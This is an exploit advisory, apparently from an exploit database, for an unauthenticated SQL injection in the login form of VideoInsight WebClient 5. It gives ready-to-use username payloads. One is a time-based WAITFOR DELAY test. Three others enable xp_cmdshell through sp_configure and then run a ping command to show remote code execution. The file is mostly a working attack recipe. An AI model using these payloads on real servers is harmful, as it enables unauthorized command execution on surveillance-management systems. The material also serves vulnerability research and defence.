26 lines
No EOL
1.1 KiB
Text
26 lines
No EOL
1.1 KiB
Text
# Title: VideoInsight WebClient 5 - SQL Injection
|
|
# Date: 2018-05-06
|
|
# Author: vosec
|
|
# Vendor Homepage: https://www.security.us.panasonic.com/
|
|
# Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/
|
|
# Version: 5
|
|
# Tested on: Windows Server 2008 R2
|
|
# CVE: N/A
|
|
|
|
# Description:
|
|
# This exploit is based on CVE-2017-5151 targeting versions prior.
|
|
# The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability
|
|
# that can be used for remote code execution.
|
|
|
|
# SQL Injection - PoC
|
|
# From the web login page submit the following string as the username with anything in the password field.
|
|
# The web server will hang for 5 seconds:
|
|
|
|
UyYr');WAITFOR DELAY '00:00:05'--
|
|
|
|
# Remote Code Execution - PoC
|
|
# From the web login page submit each of the following strings as the username, one at a time, with anything
|
|
# in the password field (with the ping, use a valid IP address that you can monitor):
|
|
UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;--
|
|
UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
|
|
UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';-- |